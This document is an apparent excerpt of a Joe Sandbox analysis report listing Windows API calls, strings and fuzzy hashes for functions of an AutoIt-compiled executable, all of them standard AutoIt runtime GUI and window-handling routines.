                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 464785882-4108050209
                                                • Opcode ID: bf3ea5ac70e9d66c63448b5adb59d752c13af2c362bb0522d1377e92a1713a0b
                                                • Instruction ID: ae7a7e4850b3141127832a8f6db9f73ecf55ed450ad2a35f5f84ecd546c180be
                                                • Opcode Fuzzy Hash: bf3ea5ac70e9d66c63448b5adb59d752c13af2c362bb0522d1377e92a1713a0b
                                                • Instruction Fuzzy Hash: 1912A030600201EFDB26CF24C988BA9B7E5FF56340F548669F559DB262CB39EC52CB61
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 007E75F3
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E76B2
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007E76F0
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007E7702
                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007E7748
                                                • GetClientRect.USER32(00000000,?), ref: 007E7754
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007E7798
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E77A7
                                                • GetStockObject.GDI32(00000011), ref: 007E77B7
                                                • SelectObject.GDI32(00000000,00000000), ref: 007E77BB
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007E77CB
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E77D4
                                                • DeleteDC.GDI32(00000000), ref: 007E77DD
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E7809
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 007E7820
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007E785B
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E786F
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 007E7880
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007E78B0
                                                • GetStockObject.GDI32(00000011), ref: 007E78BB
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E78C6
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007E78D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 2c8fe7e418eb187f8e1d837241e637c0786fa1c35577393d69654c698a81bdb3
                                                • Instruction ID: d17e8d2b60de3adc43a2bef4faf2da73c649e493f8f1ad6c2f0212e8676b5b31
                                                • Opcode Fuzzy Hash: 2c8fe7e418eb187f8e1d837241e637c0786fa1c35577393d69654c698a81bdb3
                                                • Instruction Fuzzy Hash: CDA16D71A41619BFEB14DBA4DC4AFBE7BA9EF48714F008114FA14A72E0DB74AD10CB64
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DADAA
                                                • GetDriveTypeW.KERNEL32(?,007FFAC0,?,\\.\,007FF910), ref: 007DAE87
                                                • SetErrorMode.KERNEL32(00000000,007FFAC0,?,\\.\,007FF910), ref: 007DAFE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 007FA935
                                                • SetTextColor.GDI32(?,?), ref: 007FA939
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FA94F
                                                • GetSysColor.USER32(0000000F), ref: 007FA95A
                                                • CreateSolidBrush.GDI32(?), ref: 007FA95F
                                                • GetSysColor.USER32(00000011), ref: 007FA977
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FA985
                                                • SelectObject.GDI32(?,00000000), ref: 007FA996
                                                • SetBkColor.GDI32(?,00000000), ref: 007FA99F
                                                • SelectObject.GDI32(?,?), ref: 007FA9AC
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FA9CB
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FA9E2
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007FA9F7
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FAA1F
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007FAA46
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 007FAA64
                                                • DrawFocusRect.USER32(?,?), ref: 007FAA6F
                                                • GetSysColor.USER32(00000011), ref: 007FAA7D
                                                • SetTextColor.GDI32(?,00000000), ref: 007FAA85
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007FAA99
                                                • SelectObject.GDI32(?,007FA62C), ref: 007FAAB0
                                                • DeleteObject.GDI32(?), ref: 007FAABB
                                                • SelectObject.GDI32(?,?), ref: 007FAAC1
                                                • DeleteObject.GDI32(?), ref: 007FAAC6
                                                • SetTextColor.GDI32(?,?), ref: 007FAACC
                                                • SetBkColor.GDI32(?,?), ref: 007FAAD6
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F8AF3
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F8B04
                                                • CharNextW.USER32(0000014E), ref: 007F8B33
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F8B74
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F8B8A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F8B9B
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007F8BB8
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F8C0A
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007F8C20
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F8C51
                                                • _memset.LIBCMT ref: 007F8C76
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007F8CBF
                                                • _memset.LIBCMT ref: 007F8D1E
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F8D48
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 007F8DA0
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 007F8E4D
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007F8E6F
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F8EB9
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F8EE6
                                                • DrawMenuBar.USER32(?), ref: 007F8EF5
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F8F1D
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 007F4A33
                                                • GetDesktopWindow.USER32 ref: 007F4A48
                                                • GetWindowRect.USER32(00000000), ref: 007F4A4F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F4AB1
                                                • DestroyWindow.USER32(?), ref: 007F4ADD
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F4B06
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F4B24
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007F4B4A
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 007F4B5F
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007F4B72
                                                • IsWindowVisible.USER32(?), ref: 007F4B92
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007F4BAD
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007F4BC1
                                                • GetWindowRect.USER32(?,?), ref: 007F4BD9
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 007F4BFF
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 007F4C19
                                                • CopyRect.USER32(?,?), ref: 007F4C30
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 007F4C9B
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007728BC
                                                • GetSystemMetrics.USER32(00000007), ref: 007728C4
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007728EF
                                                • GetSystemMetrics.USER32(00000008), ref: 007728F7
                                                • GetSystemMetrics.USER32(00000004), ref: 0077291C
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00772939
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00772949
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0077297C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00772990
                                                • GetClientRect.USER32(00000000,000000FF), ref: 007729AE
                                                • GetStockObject.GDI32(00000011), ref: 007729CA
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 007729D5
                                                  • Part of subcall function 00772344: GetCursorPos.USER32(?), ref: 00772357
                                                  • Part of subcall function 00772344: ScreenToClient.USER32(008357B0,?), ref: 00772374
                                                  • Part of subcall function 00772344: GetAsyncKeyState.USER32(00000001), ref: 00772399
                                                  • Part of subcall function 00772344: GetAsyncKeyState.USER32(00000002), ref: 007723A7
                                                • SetTimer.USER32(00000000,00000000,00000028,00771256), ref: 007729FC
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CA885
                                                • __swprintf.LIBCMT ref: 007CA926
                                                • _wcscmp.LIBCMT ref: 007CA939
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007CA98E
                                                • _wcscmp.LIBCMT ref: 007CA9CA
                                                • GetClassNameW.USER32(?,?,00000400), ref: 007CAA01
                                                • GetDlgCtrlID.USER32(?), ref: 007CAA53
                                                • GetWindowRect.USER32(?,?), ref: 007CAA89
                                                • GetParent.USER32(?), ref: 007CAAA7
                                                • ScreenToClient.USER32(00000000), ref: 007CAAAE
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CAB28
                                                • _wcscmp.LIBCMT ref: 007CAB3C
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 007CAB62
                                                • _wcscmp.LIBCMT ref: 007CAB76
                                                  • Part of subcall function 007937AC: _iswctype.LIBCMT ref: 007937B4
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                • String ID: %s%u
                                                • API String ID: 3744389584-679674701
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 007CB1DA
                                                • _wcscmp.LIBCMT ref: 007CB1EB
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 007CB213
                                                • CharUpperBuffW.USER32(?,00000000), ref: 007CB230
                                                • _wcscmp.LIBCMT ref: 007CB24E
                                                • _wcsstr.LIBCMT ref: 007CB25F
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CB297
                                                • _wcscmp.LIBCMT ref: 007CB2A7
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 007CB2CE
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 007CB317
                                                • _wcscmp.LIBCMT ref: 007CB327
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 007CB34F
                                                • GetWindowRect.USER32(00000004,?), ref: 007CB3B8
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 007CC2D3
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007CC2E5
                                                • SetWindowTextW.USER32(?,?), ref: 007CC2FC
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CC311
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CC317
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CC327
                                                • SetWindowTextW.USER32(00000000,?), ref: 007CC32D
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007CC34E
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007CC368
                                                • GetWindowRect.USER32(?,?), ref: 007CC371
                                                • SetWindowTextW.USER32(?,?), ref: 007CC3DC
                                                • GetDesktopWindow.USER32 ref: 007CC3E2
                                                • GetWindowRect.USER32(00000000), ref: 007CC3E9
                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007CC435
                                                • GetClientRect.USER32(?,?), ref: 007CC442
                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007CC467
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007CC492
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: a5760d6eeac4a735bd2f86985556a0704e5c493afd4ce320d4771b885b5f3974
                                                • Instruction ID: 4ff4119d6186bde5b83f5eeed636844a08e9c14c375d8bd2d1505dc5dcfb8ede
                                                • Opcode Fuzzy Hash: a5760d6eeac4a735bd2f86985556a0704e5c493afd4ce320d4771b885b5f3974
                                                • Instruction Fuzzy Hash: B9514C31900709EFDB21DFA8DD89F6EBBB5FF04705F00852CE686A25A0CB78A954DB54
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 007E5129
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 007E5134
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 007E513F
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 007E514A
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 007E5155
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 007E5160
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 007E516B
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 007E5176
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 007E5181
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 007E518C
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 007E5197
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 007E51A2
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 007E51AD
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007E51B8
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007E51C3
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 007E51CE
                                                • GetCursorInfo.USER32(?), ref: 007E51DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$Info
                                                • String ID:
                                                • API String ID: 2577412497-0
                                                • Opcode ID: ad95e1f9db49bef9114c5ae5834145256db8b976e2c58631e53b64b65b606388
                                                • Instruction ID: f18b3ef0e80c13473ad5732785c4b5402f4316c6f054d797f9c7ef9e82eeb544
                                                • Opcode Fuzzy Hash: ad95e1f9db49bef9114c5ae5834145256db8b976e2c58631e53b64b65b606388
                                                • Instruction Fuzzy Hash: CF31E5B0D4931E6ADB109FB68C8996EBEECFF08754F50452AE50DE7280DA7865008FA1
                                                APIs
                                                • _memset.LIBCMT ref: 007FA28B
                                                • DestroyWindow.USER32(00000000,?), ref: 007FA305
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007FA37F
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007FA3A1
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA3B4
                                                • DestroyWindow.USER32(00000000), ref: 007FA3D6
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007FA40D
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA426
                                                • GetDesktopWindow.USER32 ref: 007FA43F
                                                • GetWindowRect.USER32(00000000), ref: 007FA446
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007FA45E
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007FA476
                                                  • Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 1297703922-3619404913
                                                • Opcode ID: cba101a0b71966c1280e7a84c7753a88234e949db95c012dbefb37172232bb4b
                                                • Instruction ID: e1485de4ac50ae810c594caaed401ecb5326319b5d7a87265c20027d7f7b71f9
                                                • Opcode Fuzzy Hash: cba101a0b71966c1280e7a84c7753a88234e949db95c012dbefb37172232bb4b
                                                • Instruction Fuzzy Hash: 31716BB1150248AFDB20CF28DC49F7677E5FB88700F04462DFA89873A1DB78A905CB66
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DragQueryPoint.SHELL32(?,?), ref: 007FC691
                                                  • Part of subcall function 007FAB69: ClientToScreen.USER32(?,?), ref: 007FAB92
                                                  • Part of subcall function 007FAB69: GetWindowRect.USER32(?,?), ref: 007FAC08
                                                  • Part of subcall function 007FAB69: PtInRect.USER32(?,?,007FC07E), ref: 007FAC18
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FC6FA
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007FC705
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007FC728
                                                • _wcscat.LIBCMT ref: 007FC758
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007FC76F
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007FC788
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FC79F
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007FC7C1
                                                • DragFinish.SHELL32(?), ref: 007FC7C8
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007FC8BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                • API String ID: 169749273-3440237614
                                                • Opcode ID: d747941cad5671ff4586fdb9ef2348126ab2acdea2840a8b3886b001ed830caa
                                                • Instruction ID: 70ec5fd2cc06195fdd1e0f59b61c6e7bddfb565721cf83f5200bdc3d09d2c21d
                                                • Opcode Fuzzy Hash: d747941cad5671ff4586fdb9ef2348126ab2acdea2840a8b3886b001ed830caa
                                                • Instruction Fuzzy Hash: E9617C71508304EFCB01EF64DC89DABBBE9FF88750F00492DF695922A1DB749A49CB52
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007F448D
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F44D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: ead7cf53f9159c0c886f80df6ab494f856b36d63749de7cf49893562a83e8c97
                                                • Instruction ID: c2377f9875e5d04047cb9a6e232ee06be046c37fc2f9dfebc22f95c1557e14f6
                                                • Opcode Fuzzy Hash: ead7cf53f9159c0c886f80df6ab494f856b36d63749de7cf49893562a83e8c97
                                                • Instruction Fuzzy Hash: 51917E34204715DFCF14EF10C495A7AB7A1AF85360F04846CFA9A9B3A2CB38ED49CB91
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007FB8E8
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007F6B43,?), ref: 007FB944
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FB97D
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007FB9C0
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007FB9F7
                                                • FreeLibrary.KERNEL32(?), ref: 007FBA03
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007FBA13
                                                • DestroyIcon.USER32(?), ref: 007FBA22
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007FBA3F
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007FBA4B
                                                  • Part of subcall function 0079307D: __wcsicmp_l.LIBCMT ref: 00793106
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 1212759294-1154884017
                                                • Opcode ID: cd6297cd96a381087889129fbb226b4eed7021b53182f4d599717d541f13e954
                                                • Instruction ID: 6047a6c258a70b18bf69983203d8ea0a45a204add260a2f1fa0d2195d6309d42
                                                • Opcode Fuzzy Hash: cd6297cd96a381087889129fbb226b4eed7021b53182f4d599717d541f13e954
                                                • Instruction Fuzzy Hash: 0761BF71600619FAEB14EF64DC45BBE77ACFF08720F108119FA15D62D1DB78A980DBA0
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 007DDD68
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 007DDD78
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007DDD84
                                                • __wsplitpath.LIBCMT ref: 007DDDE2
